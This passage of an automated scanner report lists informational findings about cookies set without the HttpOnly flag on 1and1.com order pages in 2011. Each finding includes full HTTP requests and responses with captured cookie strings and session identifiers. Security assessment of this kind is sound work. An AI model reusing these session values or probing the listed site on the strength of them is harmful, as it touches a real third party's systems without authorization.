Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:23:34 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=69cc255bf110d400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/DomaininfoMove;jsessionid=5D87D3355F186E87A28F3433AA76964D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.12. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Eshops HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=17a1be1e9220e400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Eshops;jsessionid=93E7519C57903B3695EBCA6C365B1E4A.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.13. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 864e2e4f35ed6ab3549b3f5dceba36dd
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64223


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsChat HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:48 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7e3e5cc19ca64c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsChat;jsessionid=98481BE7B1BAD40F34B26AECE3954431.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsChat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsChat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=cY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiMmISQlHh8=; Expires=Fri, 07-Apr-2079 21:59:59 GMT; Path=/
ETag: 649375030d8d5b092e64c0990c7227c7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17430


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsDialogue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:53 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=74fc0aa587c04000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue;jsessionid=6DF937C1E40F46F9A945480B8F746B9E.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsDialogue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsDialogue;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 22:00:10 GMT; Path=/
ETag: a829bbc7520903930ff28daacf019702
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18884


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:57:02 GMT; Path=/
ETag: 157a157c4870deee2d847106f79230e2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18630


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsMerchandise

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsMerchandise HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:42:45 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7baf8e23846d6000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=E774DB4A4A0EB5F696B7948BC9A831E3.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsNewsletter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:59:45 GMT; Path=/
ETag: 63515a3a29b9c6da1d454cc05fbe4914
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureCommunicationToolsNewsletter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureCommunicationToolsNewsletter HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:29 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2a108f85d005a000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter;jsessionid=8E8CD48E54F5EC2976D3A901BCB12DF2.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.22. http://order.1and1.com/xml/order/FeatureControlCenter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:40:00 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:54:07 GMT; Path=/
ETag: c53f0aeb8d5968fbc0f0b623806a385a
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17592


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.23. http://order.1and1.com/xml/order/FeatureControlCenter

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureControlCenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureControlCenter HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
